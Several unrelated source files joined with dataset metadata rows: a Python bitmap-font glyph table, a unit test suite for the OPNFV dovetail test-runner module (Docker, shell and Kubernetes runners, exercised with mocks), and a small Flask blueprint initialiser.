[0, 0, 0, 1, 1, 0, 0, 0]
]
c_z = [
[1, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 1, 1, 0],
[1, 1, 1, 1, 1, 1, 1],
[0, 1, 1, 0, 0, 0, 0],
[1, 1, 1, 1, 1, 1, 1]
]
c_space = [
[0, 0, 0, 0],
[0, 0, 0, 0],
[0, 0, 0, 0],
[0, 0, 0, 0],
[0, 0, 0, 0]
]
c_escl = [
[0, 1, 1, 0],
[0, 1, 1, 0],
[0, 1, 1, 0],
[0, 0, 0, 0],
[0, 1, 1, 0]
]
c_quest = [
[0, 1, 1, 1, 0],
[1, 0, 0, 0, 1],
[0, 0, 1, 1, 0],
[0, 0, 0, 0, 0],
[0, 0, 1, 0, 0]
]
c_minus = [
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 1, 1, 1, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0]
]
c_plus = [
[0, 0, 0, 0, 0],
[0, 0, 1, 0, 0],
[0, 1, 1, 1, 0],
[0, 0, 1, 0, 0],
[0, 0, 0, 0, 0]
]
c_mul = [
[0, 0, 0, 0, 0],
[0, 1, 0, 1, 0],
[0, 0, 1, 0, 0],
[0, 1, 0, 1, 0],
[0, 0, 0, 0, 0]
]
c_slash = [
[0, 0, 0, 0, 1],
[0, 0, 0, 1, 0],
[0, 0, 1, 0, 0],
[0, 1, 0, 0, 0],
[1, 0, 0, 0, 0]
]
c_bslash = [
[1, 0, 0, 0, 0],
[0, 1, 0, 0, 0],
[0, 0, 1, 0, 0],
[0, 0, 0, 1, 0],
[0, 0, 0, 0, 1]
]
c_dot = [
[0, 0, 0],
[0, 0, 0],
[0, 0, 0],
[0, 0, 0],
[0, 1, 0]
]
c_com = [
[0, 0, 0],
[0, 0, 0],
[0, 0, 0],
[0, 1, 0],
[1, 0, 0]
]
c_colon = [
[0, 0, 0],
[0, 1, 0],
[0, 0, 0],
[0, 1, 0],
[0, 0, 0]
]
alphabet = {
'a': c_a,
'b': c_b,
'c': c_c,
'd': c_d,
'e': c_e,
'f': c_f,
'g': c_g,
'h': c_h,
'i': c_i,
'j': c_j,
'k': c_k,
'l': c_l,
'm': c_m,
'n': c_n,
'o': c_o,
'p': c_p,
'q': c_q,
'r': c_r,
's': c_s,
't': c_t,
'u': c_u,
'v': c_v,
'w': c_w,
'x': c_x,
'y': c_y,
'z': c_z,
' ': c_space,
'!': c_escl,
'?': c_quest,
'-': c_minus,
'+': c_plus,
'*': c_mul,
'/': c_slash,
'\\': c_bslash,
'.': c_dot,
',': c_com,
':': c_colon
}
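A minimal sketch of how these 5-row bitmaps can be combined into printable text. The `render` helper and its fill characters are illustrative additions, not part of the module; the excerpt dict below stands in for the full `alphabet` defined above:

```python
# Hypothetical renderer for the bitmap font above; `alphabet` here is a
# two-glyph excerpt standing in for the full module-level dict.
alphabet = {
    'h': [[1, 1, 0, 0, 1, 1],
          [1, 1, 0, 0, 1, 1],
          [1, 1, 1, 1, 1, 1],
          [1, 1, 0, 0, 1, 1],
          [1, 1, 0, 0, 1, 1]],
    'i': [[0, 1, 1, 0]] * 5,
}


def render(text, on='#', off=' ', gap=' '):
    """Join each character's rows side by side into five output lines."""
    return '\n'.join(
        gap.join(''.join(on if bit else off for bit in alphabet[ch][row])
                 for ch in text)
        for row in range(5))


print(render('hi'))
```

Each glyph contributes its own row slice per output line, so characters of different widths (like the narrow `i`) compose naturally.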
# --- dovetail/tests/unit/test_test_runner.py (repo: xudan2189/dovetail, license: Apache-2.0) ---
#!/usr/bin/env python
#
# Copyright (c) 2018 mokats@intracom-telecom.com and others.
#
# All rights reserved. This program and the accompanying materials
# are made available under the terms of the Apache License, Version 2.0
# which accompanies this distribution, and is available at
# http://www.apache.org/licenses/LICENSE-2.0
##
import unittest
from mock import patch, call, Mock
import dovetail.test_runner as t_runner
__author__ = 'Stamatis Katsaounis <mokats@intracom-telecom.com>'
class TestRunnerTesting(unittest.TestCase):
def setUp(self):
self.patcher1 = patch.object(t_runner, 'dt_logger')
self.patcher2 = patch.object(t_runner.DockerRunner,
'_update_config')
self.logger = self.patcher1.start().return_value
self._update_config = self.patcher2.start().return_value
self.testcase = Mock()
self.testcase_name = 'testcase_name'
self.testcase_type = 'functest'
self.testcase_dict = {}
self.testcase_valid = 'validate_testcase'
self.testcase.testcase = self.testcase_dict
self.testcase.name.return_value = self.testcase_name
self.testcase.validate_testcase.return_value = self.testcase_valid
self.testcase.validate_type.return_value = self.testcase_type
def tearDown(self):
self.patcher1.stop()
self.patcher2.stop()
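The `start()`/`stop()` pairing in `setUp`/`tearDown` above follows the standard mock patcher lifecycle. A self-contained sketch of that lifecycle (the `Example` class is hypothetical; the suite itself uses the `mock` backport rather than `unittest.mock`):

```python
from unittest.mock import patch


class Example(object):
    value = 'real'


patcher = patch.object(Example, 'value', 'mocked')
patcher.start()            # attribute is replaced until stop() is called
during = Example.value
patcher.stop()             # tearDown-style cleanup restores the original
after = Example.value
print(during, after)
```

Starting patchers in `setUp` and stopping them in `tearDown` guarantees every test method sees the same patched state and that nothing leaks between tests.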
@patch('dovetail.test_runner.dt_utils')
@patch('dovetail.test_runner.dt_cfg')
@patch('dovetail.test_runner.Container')
def test_run_offline_not_exist(self, mock_container, mock_config,
mock_utils):
t_runner.FunctestRunner.create_log()
mock_config.dovetail_config = {
'offline': True, 'result_dir': 'result_dir'
}
docker_runner = t_runner.TestRunnerFactory.create(self.testcase)
container_obj = Mock()
docker_img_obj = Mock()
container_obj.get_docker_image.return_value = docker_img_obj
container_obj.get_image_id.return_value = False
mock_container.return_value = container_obj
docker_runner.run()
mock_container.assert_called_once_with(self.testcase)
container_obj.get_docker_image.assert_called_once_with()
container_obj.get_image_id.assert_called_once_with(docker_img_obj)
docker_runner.logger.error.assert_called_once_with(
"{} image doesn't exist, can't run offline.".format(
self.testcase_type))
@patch('dovetail.test_runner.dt_utils')
@patch('dovetail.test_runner.dt_cfg')
@patch('dovetail.test_runner.Container')
def test_run__not_offline_no_pull(self, mock_container, mock_config,
mock_utils):
t_runner.YardstickRunner.create_log()
mock_config.dovetail_config = {
'offline': False, 'result_dir': 'result_dir'
}
docker_runner = t_runner.YardstickRunner(self.testcase)
container_obj = Mock()
docker_img_obj = Mock()
container_obj.get_docker_image.return_value = docker_img_obj
container_obj.pull_image.return_value = False
mock_container.return_value = container_obj
docker_runner.run()
mock_container.assert_called_once_with(self.testcase)
container_obj.get_docker_image.assert_called_once_with()
container_obj.pull_image.assert_called_once_with(docker_img_obj)
docker_runner.logger.error.assert_called_once_with(
'Failed to pull the image.')
@patch('dovetail.test_runner.dt_utils')
@patch('dovetail.test_runner.dt_cfg')
@patch('dovetail.test_runner.Container')
def test_run__not_offline_no_create(self, mock_container, mock_config,
mock_utils):
t_runner.BottlenecksRunner.create_log()
mock_config.dovetail_config = {
'offline': False, 'result_dir': 'result_dir'
}
docker_runner = t_runner.BottlenecksRunner(self.testcase)
container_obj = Mock()
docker_img_obj = Mock()
container_obj.get_docker_image.return_value = docker_img_obj
container_obj.pull_image.return_value = True
container_obj.create.return_value = False
mock_container.return_value = container_obj
docker_runner.run()
mock_container.assert_called_once_with(self.testcase)
container_obj.get_docker_image.assert_called_once_with()
container_obj.pull_image.assert_called_once_with(docker_img_obj)
container_obj.create.assert_called_once_with(docker_img_obj)
docker_runner.logger.error.assert_called_once_with(
'Failed to create container.')
@patch('dovetail.test_runner.dt_utils')
@patch('dovetail.test_runner.dt_cfg')
@patch('dovetail.test_runner.Container')
def test_run__not_offline_no_prepare(self, mock_container,
mock_config, mock_utils):
t_runner.FunctestRunner.create_log()
mock_config.dovetail_config = {
'offline': False,
'noclean': False,
'result_dir': 'result_dir'
}
docker_runner = t_runner.FunctestRunner(self.testcase)
container_obj = Mock()
docker_img_obj = Mock()
container_obj.get_docker_image.return_value = docker_img_obj
container_obj.pull_image.return_value = True
container_id = '12345'
container_obj.create.return_value = container_id
mock_container.return_value = container_obj
self.testcase.pre_condition.return_value = ['cmd']
self.testcase.prepare_cmd.return_value = False
self.testcase.post_condition.return_value = ['cmd']
container_obj.exec_cmd.return_value = (1, 'error')
docker_runner.run()
mock_container.assert_called_once_with(self.testcase)
container_obj.get_docker_image.assert_called_once_with()
container_obj.pull_image.assert_called_once_with(docker_img_obj)
container_obj.create.assert_called_once_with(docker_img_obj)
docker_runner.logger.debug.assert_called_with(
'container id: {}'.format(container_id))
self.testcase.pre_condition.assert_called_once_with()
container_obj.exec_cmd.assert_has_calls([
call('cmd'), call('cmd')])
self.testcase.prepare_cmd.assert_called_once_with(self.testcase_type)
self.testcase.post_condition.assert_called_once_with()
docker_runner.logger.error.assert_has_calls([
call('Failed to exec all pre_condition cmds.'),
call('Failed to prepare test case: {}'
.format(self.testcase_name))])
container_obj.clean.assert_called_once_with()
@patch('dovetail.test_runner.dt_utils')
@patch('dovetail.test_runner.dt_cfg')
@patch('dovetail.test_runner.Container')
def test_run__not_offline_prepare(self, mock_container,
mock_config, mock_utils):
t_runner.FunctestRunner.create_log()
mock_config.dovetail_config = {
'offline': False,
'noclean': False,
'result_dir': 'result_dir'
}
docker_runner = t_runner.FunctestRunner(self.testcase)
container_obj = Mock()
docker_img_obj = Mock()
container_obj.get_docker_image.return_value = docker_img_obj
container_obj.pull_image.return_value = True
container_id = '12345'
container_obj.create.return_value = container_id
mock_container.return_value = container_obj
self.testcase.pre_condition.return_value = ['cmd']
self.testcase.prepare_cmd.return_value = True
self.testcase.post_condition.return_value = ['cmd']
self.testcase.cmds = ['cmd']
container_obj.exec_cmd.return_value = (1, 'error')
docker_runner.run()
mock_container.assert_called_once_with(self.testcase)
container_obj.get_docker_image.assert_called_once_with()
container_obj.pull_image.assert_called_once_with(docker_img_obj)
container_obj.create.assert_called_once_with(docker_img_obj)
docker_runner.logger.debug.assert_called_with(
'container id: {}'.format(container_id))
self.testcase.pre_condition.assert_called_once_with()
container_obj.exec_cmd.assert_has_calls([
call('cmd'), call('cmd'), call('cmd')])
self.testcase.prepare_cmd.assert_called_once_with(self.testcase_type)
self.testcase.post_condition.assert_called_once_with()
docker_runner.logger.error.assert_has_calls([
call('Failed to exec all pre_condition cmds.'),
call('Failed to exec {}, ret: {}, msg: {}'
.format('cmd', 1, 'error'))])
container_obj.clean.assert_called_once_with()
@patch('dovetail.test_runner.dt_cfg')
@patch('dovetail.test_runner.dt_utils')
@patch('dovetail.test_runner.os')
def test_archive_logs_no_files(self, mock_os, mock_utils, mock_config):
t_runner.FunctestRunner.create_log()
mock_config.dovetail_config = {'result_dir': 'result_dir'}
docker_runner = t_runner.FunctestRunner(self.testcase)
mock_os.environ = {'DOVETAIL_HOME': 'dovetail_home'}
mock_utils.get_value_from_dict.return_value = []
result = docker_runner.archive_logs()
mock_os.path.join.assert_has_calls([call('dovetail_home', 'results')])
mock_utils.get_value_from_dict.assert_has_calls([
call('report.source_archive_files', self.testcase_dict),
call('report.dest_archive_files', self.testcase_dict)])
        self.assertEqual(True, result)
@patch('dovetail.test_runner.dt_cfg')
@patch('dovetail.test_runner.dt_utils')
@patch('dovetail.test_runner.os')
def test_archive_logs_difference_in_files(self, mock_os, mock_utils,
mock_config):
t_runner.FunctestRunner.create_log()
mock_config.dovetail_config = {'result_dir': 'result_dir'}
docker_runner = t_runner.FunctestRunner(self.testcase)
mock_os.environ = {'DOVETAIL_HOME': 'dovetail_home'}
mock_utils.get_value_from_dict.side_effect = [[], ['file']]
result = docker_runner.archive_logs()
mock_os.path.join.assert_has_calls([call('dovetail_home', 'results')])
mock_utils.get_value_from_dict.assert_has_calls([
call('report.source_archive_files', self.testcase_dict),
call('report.dest_archive_files', self.testcase_dict)])
docker_runner.logger.error.assert_called_once_with(
"Can't find corresponding 'result_dest_files' "
"for 'result_source_files' with testcase {}"
.format(self.testcase_name))
        self.assertEqual(False, result)
@patch('dovetail.test_runner.dt_cfg')
@patch('dovetail.test_runner.dt_utils')
@patch('dovetail.test_runner.os')
def test_archive_logs_src_file_error(self, mock_os, mock_utils,
mock_config):
t_runner.FunctestRunner.create_log()
mock_config.dovetail_config = {'result_dir': 'result_dir'}
docker_runner = t_runner.FunctestRunner(self.testcase)
mock_os.environ = {'DOVETAIL_HOME': 'dovetail_home'}
mock_utils.get_value_from_dict.side_effect = [['src_file'],
['dst_file']]
mock_os.path.join.side_effect = ['result_path', 'src_file_path',
'dest_file_path']
mock_os.path.isfile.return_value = False
result = docker_runner.archive_logs()
mock_os.path.join.assert_has_calls([
call('dovetail_home', 'results'),
call('result_path', 'src_file'),
call('result_path', 'dst_file')])
mock_utils.get_value_from_dict.assert_has_calls([
call('report.source_archive_files', self.testcase_dict),
call('report.dest_archive_files', self.testcase_dict)])
mock_os.path.isfile.assert_has_calls([call('src_file_path')])
docker_runner.logger.error.assert_called_once_with(
"Can't find file {}.".format('src_file_path'))
        self.assertEqual(False, result)
@patch('dovetail.test_runner.dt_cfg')
@patch('dovetail.test_runner.dt_utils')
@patch('dovetail.test_runner.os')
def test_archive_logs_src_file_exists(self, mock_os, mock_utils,
mock_config):
t_runner.FunctestRunner.create_log()
mock_config.dovetail_config = {'result_dir': 'result_dir'}
docker_runner = t_runner.FunctestRunner(self.testcase)
mock_os.environ = {'DOVETAIL_HOME': 'dovetail_home'}
mock_utils.get_value_from_dict.side_effect = [['src_file'],
['dst_file']]
mock_os.path.join.side_effect = ['result_path', 'src_file_path',
'dest_file_path']
mock_os.path.isfile.return_value = True
result = docker_runner.archive_logs()
mock_os.path.join.assert_has_calls([
call('dovetail_home', 'results'),
call('result_path', 'src_file'),
call('result_path', 'dst_file')])
mock_utils.get_value_from_dict.assert_has_calls([
call('report.source_archive_files', self.testcase_dict),
call('report.dest_archive_files', self.testcase_dict)])
mock_os.path.isfile.assert_has_calls([call('src_file_path')])
mock_os.renames.assert_called_once_with(
'src_file_path', 'dest_file_path')
        self.assertEqual(True, result)
@patch('dovetail.test_runner.jinja2')
def test_render(self, mock_jinja):
render_obj = Mock()
template_obj = Mock()
mock_jinja.Template.return_value = template_obj
template_obj.render.return_value = render_obj
result = t_runner.FunctestRunner._render('task_template')
mock_jinja.Template.assert_called_once_with('task_template')
template_obj.render.assert_called_with()
        self.assertEqual(render_obj, result)
@patch('dovetail.test_runner.dt_cfg')
@patch('dovetail.test_runner.os')
def test_add_testcase_info(self, mock_os, mock_config):
mock_os.getenv.side_effect = ['os_insecure', 'dovetail_home', 'debug',
'os_cacert', 'host_url', 'csar_file',
'heat_templates_archive']
mock_os.environ = {'DEPLOY_SCENARIO': 'deploy_scenario'}
mock_config.dovetail_config = {'build_tag': 'build_tag'}
expected = {
'validate_testcase': 'validate_testcase',
'testcase': 'testcase_name', 'os_insecure': 'os_insecure',
'deploy_scenario': 'deploy_scenario',
'dovetail_home': 'dovetail_home', 'debug': 'debug',
'build_tag': 'build_tag', 'cacert': 'os_cacert',
'host_url': 'host_url', 'csar_file': 'csar_file',
'heat_templates_archive': 'heat_templates_archive'
}
result = t_runner.FunctestRunner._add_testcase_info(self.testcase)
self.testcase.validate_testcase.assert_called_once_with()
self.testcase.name.assert_called_once_with()
mock_os.getenv.assert_has_calls([
call('OS_INSECURE'), call('DOVETAIL_HOME'), call('DEBUG'),
call('OS_CACERT'), call('HOST_URL'), call('CSAR_FILE'),
call('VNF_ARCHIVE_NAME')])
        self.assertEqual(expected, result)
@patch('dovetail.test_runner.dt_utils')
@patch('dovetail.test_runner.dt_cfg')
@patch('dovetail.test_runner.os.path')
@patch('dovetail.test_runner.constants')
def test_update_config_no_task_template(self, mock_const, mock_path,
mock_config, mock_utils):
t_runner.FunctestRunner.create_log()
mock_config.dovetail_config = {
'config_dir': 'one', 'pod_file': 'two', 'result_dir': 'three'}
docker_runner = t_runner.FunctestRunner(self.testcase)
mock_path.join.side_effect = ['config_file', 'pod_file']
mock_utils.read_yaml_file.return_value = 'pod_info'
mock_utils.read_plain_file.return_value = None
mock_const.CONF_PATH = 'conf_path'
self.patcher2.stop()
result = docker_runner._update_config(self.testcase)
self.patcher2.start()
mock_path.join.assert_has_calls([
call('three', 'endpoint_info.json'),
call('conf_path', docker_runner.config_file_name)])
mock_utils.read_plain_file.assert_called_once_with(
'config_file', docker_runner.logger)
        self.assertEqual(None, result)
@patch('dovetail.test_runner.yaml.safe_load')
@patch('dovetail.test_runner.dt_utils')
@patch('dovetail.test_runner.dt_cfg')
@patch('dovetail.test_runner.os.path')
@patch('dovetail.test_runner.constants')
@patch.object(t_runner.DockerRunner, '_add_testcase_info')
@patch.object(t_runner.DockerRunner, '_render')
def test_update_config_pod_info_key_err(self, mock_render, mock_add_info,
mock_const, mock_path, mock_config,
mock_utils, mock_load):
t_runner.FunctestRunner.create_log()
mock_config.dovetail_config = {
'config_dir': 'one', 'pod_file': 'two', 'result_dir': 'three'}
docker_runner = t_runner.FunctestRunner(self.testcase)
mock_path.join.side_effect = ['config_file', 'pod_file']
mock_utils.read_yaml_file.return_value = {'key': 'value'}
mock_utils.read_plain_file.return_value = True
mock_const.CONF_PATH = 'conf_path'
mock_add_info.return_value = {'config_item': 'item'}
mock_render.return_value = 'full_task'
mock_load.return_value = {'full_task_yaml': 'full_value'}
self.patcher2.stop()
result = docker_runner._update_config(self.testcase)
self.patcher2.start()
mock_path.join.assert_has_calls([
call('three', 'endpoint_info.json'),
call('conf_path', docker_runner.config_file_name),
call('one', 'two')])
mock_add_info.assert_called_once_with(self.testcase)
mock_render.assert_called_once_with(True, config_item='item')
mock_load.assert_called_once_with('full_task')
        self.assertEqual(
{'config_dir': 'one',
'pod_file': 'two',
'full_task_yaml': 'full_value',
'result_dir': 'three'},
result)
@patch('dovetail.test_runner.yaml.safe_load')
@patch('dovetail.test_runner.dt_utils')
@patch('dovetail.test_runner.dt_cfg')
@patch('dovetail.test_runner.os.path')
@patch('dovetail.test_runner.constants')
@patch.object(t_runner.DockerRunner, '_add_testcase_info')
@patch.object(t_runner.DockerRunner, '_render')
def test_update_config_pod_info_no_info(self, mock_render, mock_add_info,
mock_const, mock_path, mock_config,
mock_utils, mock_load):
t_runner.FunctestRunner.create_log()
mock_config.dovetail_config = {
'config_dir': 'one', 'pod_file': 'two', 'result_dir': 'three'}
docker_runner = t_runner.FunctestRunner(self.testcase)
mock_path.join.side_effect = ['config_file', 'pod_file']
mock_utils.read_yaml_file.return_value = False
mock_utils.read_plain_file.return_value = True
mock_const.CONF_PATH = 'conf_path'
mock_add_info.return_value = {'config_item': 'item'}
mock_render.return_value = 'full_task'
mock_load.return_value = {'full_task_yaml': 'full_value'}
self.patcher2.stop()
result = docker_runner._update_config(self.testcase)
self.patcher2.start()
mock_path.join.assert_has_calls([
call('three', 'endpoint_info.json'),
call('conf_path', docker_runner.config_file_name),
call('one', 'two')])
mock_add_info.assert_called_once_with(self.testcase)
mock_render.assert_called_once_with(True, config_item='item')
mock_load.assert_called_once_with('full_task')
        self.assertEqual(
{'config_dir': 'one',
'pod_file': 'two',
'full_task_yaml': 'full_value',
'result_dir': 'three'},
result)
@patch('dovetail.test_runner.yaml.safe_load')
@patch('dovetail.test_runner.dt_utils')
@patch('dovetail.test_runner.dt_cfg')
@patch('dovetail.test_runner.os.path')
@patch('dovetail.test_runner.constants')
@patch.object(t_runner.DockerRunner, '_add_testcase_info')
@patch.object(t_runner.DockerRunner, '_render')
def test_update_config_pod_info(self, mock_render, mock_add_info,
mock_const, mock_path, mock_config,
mock_utils, mock_load):
t_runner.FunctestRunner.create_log()
mock_config.dovetail_config = {
'config_dir': 'one', 'pod_file': 'two', 'result_dir': 'three'}
docker_runner = t_runner.FunctestRunner(self.testcase)
mock_path.join.side_effect = ['config_file', 'pod_file']
mock_utils.read_yaml_file.return_value = {
'process_info': [
{'key': 'value'}, {'testcase_name': self.testcase_name}
]}
mock_utils.read_plain_file.return_value = True
mock_const.CONF_PATH = 'conf_path'
mock_add_info.return_value = {'config_item': 'item'}
mock_render.return_value = 'full_task'
mock_load.return_value = {'full_task_yaml': 'full_value'}
self.patcher2.stop()
result = docker_runner._update_config(self.testcase)
self.patcher2.start()
mock_path.join.assert_has_calls([
call('three', 'endpoint_info.json'),
call('conf_path', docker_runner.config_file_name),
call('one', 'two')])
mock_add_info.assert_called_once_with(
self.testcase, {'testcase_name': self.testcase_name})
docker_runner.logger.error.assert_called_once_with(
"Need key '{}' in {}".format('testcase_name', {'key': 'value'}))
mock_render.assert_called_once_with(True, config_item='item')
mock_load.assert_called_once_with('full_task')
        self.assertEqual(
{'config_dir': 'one',
'pod_file': 'two',
'full_task_yaml': 'full_value',
'result_dir': 'three'},
result)
@patch('__builtin__.open')
@patch('dovetail.test_runner.json')
@patch('dovetail.test_runner.dt_cfg')
@patch('dovetail.test_runner.dt_utils')
@patch('dovetail.test_runner.os.path')
def test_shell_run_prepare_cmd(self, mock_path, mock_utils, mock_config,
mock_json, mock_open):
t_runner.ShellRunner.create_log()
docker_runner = t_runner.ShellRunner(self.testcase)
self.testcase.cmds = ['cmd']
self.testcase.pre_condition.return_value = ['cmd']
self.testcase.post_condition.return_value = ['cmd']
self.testcase.prepare_cmd.return_value = True
mock_utils.exec_cmd.return_value = (1, 'error')
mock_path.join.return_value = 'join_path'
mock_config.dovetail_config = {'result_dir': 'result'}
file_obj = Mock()
mock_open.return_value.__enter__.return_value = file_obj
dump_obj = Mock()
mock_json.dumps.return_value = dump_obj
docker_runner.run()
self.testcase.pre_condition.assert_called_once_with()
self.testcase.prepare_cmd.assert_called_once_with(docker_runner.type)
docker_runner.logger.error.assert_called_once_with(
'Failed to execute all pre_condition cmds.')
mock_utils.exec_cmd.assert_has_calls([
call('cmd', docker_runner.logger),
call('cmd', docker_runner.logger),
call('cmd', docker_runner.logger)])
self.testcase.post_condition.assert_called_once_with()
mock_path.join.assert_called_once_with(
'result', self.testcase_name)
docker_runner.logger.debug.assert_called_with(
'Save result: {}'.format('join_path.out'))
mock_open.assert_called_once_with('join_path.out', 'w')
mock_json.dumps.assert_called_once_with(
{'results': [
('cmd', 1, 'error'),
('cmd', 1, 'error'),
('cmd', 1, 'error')],
'pass': 'FAIL'})
file_obj.write.assert_called_once_with(dump_obj)
@patch('__builtin__.open')
@patch('dovetail.test_runner.dt_cfg')
@patch('dovetail.test_runner.dt_utils')
@patch('dovetail.test_runner.os.path')
def test_shell_run_no_prepare_cmd_and_exception(self, mock_path,
mock_utils, mock_config,
mock_open):
t_runner.ShellRunner.create_log()
docker_runner = t_runner.ShellRunner(self.testcase)
self.testcase.cmds = ['cmd']
self.testcase.pre_condition.return_value = ['cmd']
self.testcase.post_condition.return_value = ['cmd']
self.testcase.prepare_cmd.return_value = False
mock_utils.exec_cmd.return_value = (1, 'error')
mock_path.join.return_value = 'join_path'
mock_config.dovetail_config = {'result_dir': 'result'}
mock_open.return_value.__enter__.side_effect = Exception('error')
docker_runner.run()
self.testcase.pre_condition.assert_called_once_with()
self.testcase.prepare_cmd.assert_called_once_with(docker_runner.type)
docker_runner.logger.error.assert_has_calls([
call('Failed to execute all pre_condition cmds.'),
call('Failed to prepare cmd: {}'.format(self.testcase_name))])
mock_utils.exec_cmd.assert_has_calls([
call('cmd', docker_runner.logger),
call('cmd', docker_runner.logger)])
self.testcase.post_condition.assert_called_once_with()
mock_path.join.assert_called_once_with(
'result', self.testcase_name)
docker_runner.logger.debug.assert_called_with(
'Save result: {}'.format('join_path.out'))
mock_open.assert_called_once_with('join_path.out', 'w')
def test_factory_error(self):
self.testcase.validate_type.return_value = 'unknown'
docker_runner = t_runner.TestRunnerFactory()
result = docker_runner.create(self.testcase)
self.assertIsNone(result)
@patch('dovetail.test_runner.constants')
@patch('dovetail.test_runner.dt_utils')
@patch('dovetail.test_runner.os.path')
def test_k8s_update_config_no_task_template(self, mock_path, mock_utils,
mock_const):
t_runner.FunctestK8sRunner.create_log()
mock_utils.read_plain_file.return_value = None
mock_path.join.side_effect = ['config_file']
mock_const.CONF_PATH = 'conf_path'
docker_runner = t_runner.FunctestK8sRunner(self.testcase)
self.patcher2.stop()
result = docker_runner._update_config(self.testcase, update_pod=False)
self.patcher2.start()
mock_path.join.assert_has_calls([
call('conf_path', docker_runner.config_file_name)])
mock_utils.read_plain_file.assert_has_calls([
call('config_file', docker_runner.logger)])
self.assertIsNone(result)
@patch('dovetail.test_runner.yaml.safe_load')
@patch('dovetail.test_runner.constants')
@patch('dovetail.test_runner.dt_utils')
@patch('dovetail.test_runner.os.path')
@patch('dovetail.test_runner.dt_cfg')
@patch.object(t_runner.DockerRunner, '_add_testcase_info')
@patch.object(t_runner.DockerRunner, '_render')
def test_k8s_update_config(self, mock_render, mock_add_info, mock_config,
mock_path, mock_utils, mock_const, mock_load):
t_runner.FunctestK8sRunner.create_log()
mock_utils.read_plain_file.return_value = True
mock_path.join.side_effect = ['config_file', 'config_file']
mock_const.CONF_PATH = 'conf_path'
mock_add_info.return_value = {'config_item': 'item'}
mock_render.return_value = 'full_task'
mock_load.return_value = {'full_task_yaml': 'full_value'}
mock_config.dovetail_config = {
'config_dir': 'one', 'pod_file': 'two'}
docker_runner = t_runner.FunctestK8sRunner(self.testcase)
self.patcher2.stop()
result = docker_runner._update_config(self.testcase, update_pod=False)
self.patcher2.start()
mock_path.join.assert_has_calls([
call('conf_path', docker_runner.config_file_name)])
mock_utils.read_plain_file.assert_has_calls([
call('config_file', docker_runner.logger)])
mock_add_info.assert_has_calls([call(self.testcase)])
mock_render.assert_has_calls([call(True, config_item='item')])
mock_load.assert_has_calls([call('full_task')])
self.assertEqual(
{'config_dir': 'one',
'pod_file': 'two',
'full_task_yaml': 'full_value'},
result)
@patch('dovetail.test_runner.dt_utils')
@patch('dovetail.test_runner.os.path')
@patch('dovetail.test_runner.dt_cfg')
def test_init_onapvtprunner_no_env_file(self, mock_config, mock_path,
mock_utils):
t_runner.OnapVtpRunner.create_log()
mock_path.join.side_effect = ['env_file']
mock_config.dovetail_config = {'config_dir': 'one', 'env_file': 'two'}
mock_path.isfile.return_value = False
docker_runner = t_runner.OnapVtpRunner(self.testcase)
mock_path.join.assert_has_calls([call('one', 'two')])
mock_path.isfile.assert_called_once()
docker_runner.logger.error.assert_called_once_with(
'File env_file does not exist.')
@patch('dovetail.test_runner.dt_utils')
@patch('dovetail.test_runner.os.path')
@patch('dovetail.test_runner.dt_cfg')
def test_init_onapvtprunner(self, mock_config, mock_path, mock_utils):
t_runner.OnapVtpRunner.create_log()
mock_path.join.side_effect = ['env_file']
mock_config.dovetail_config = {'config_dir': 'one', 'env_file': 'two'}
mock_path.isfile.return_value = True
t_runner.OnapVtpRunner(self.testcase)
mock_path.join.assert_has_calls([call('one', 'two')])
mock_path.isfile.assert_called_once()
mock_utils.source_env.assert_called_once_with('env_file')
@patch('dovetail.test_runner.dt_utils')
@patch('dovetail.test_runner.os.path')
@patch('dovetail.test_runner.dt_cfg')
def test_init_onapvvprunner_no_env_file(self, mock_config, mock_path,
mock_utils):
t_runner.OnapVvpRunner.create_log()
mock_path.join.side_effect = ['env_file']
mock_config.dovetail_config = {'config_dir': 'one', 'env_file': 'two'}
mock_path.isfile.return_value = False
docker_runner = t_runner.OnapVvpRunner(self.testcase)
mock_path.join.assert_has_calls([call('one', 'two')])
mock_path.isfile.assert_called_once()
docker_runner.logger.error.assert_called_once_with(
'File env_file does not exist.')
@patch('dovetail.test_runner.dt_utils')
@patch('dovetail.test_runner.os.path')
@patch('dovetail.test_runner.dt_cfg')
def test_init_onapvvprunner(self, mock_config, mock_path, mock_utils):
t_runner.OnapVvpRunner.create_log()
mock_path.join.side_effect = ['env_file']
mock_config.dovetail_config = {'config_dir': 'one', 'env_file': 'two'}
mock_path.isfile.return_value = True
t_runner.OnapVvpRunner(self.testcase)
mock_path.join.assert_has_calls([call('one', 'two')])
mock_path.isfile.assert_called_once()
mock_utils.source_env.assert_called_once_with('env_file')
| 45.381153 | 79 | 0.657968 | 3,919 | 32,266 | 5.012758 | 0.056902 | 0.060473 | 0.070552 | 0.088979 | 0.867345 | 0.846577 | 0.834004 | 0.818885 | 0.801171 | 0.791296 | 0 | 0.002054 | 0.230614 | 32,266 | 710 | 80 | 45.44507 | 0.789285 | 0.009732 | 0 | 0.744715 | 0 | 0 | 0.183771 | 0.077422 | 0 | 0 | 0 | 0 | 0.19187 | 1 | 0.042276 | false | 0.001626 | 0.004878 | 0 | 0.04878 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
a427cbbf5267915cc4b35d7e9060f3811469c75f | 157 | py | Python | app/blueprints/open_main/__init__.py | lvyaoo/wx-open-project | 6f6683c5267fac50b6c8479c148aa1f35cf0f930 | [
"MIT"
] | null | null | null | app/blueprints/open_main/__init__.py | lvyaoo/wx-open-project | 6f6683c5267fac50b6c8479c148aa1f35cf0f930 | [
"MIT"
] | null | null | null | app/blueprints/open_main/__init__.py | lvyaoo/wx-open-project | 6f6683c5267fac50b6c8479c148aa1f35cf0f930 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from flask import Blueprint
bp_open_main = Blueprint('bp_open_main', __name__, static_folder='static')
from . import extensions
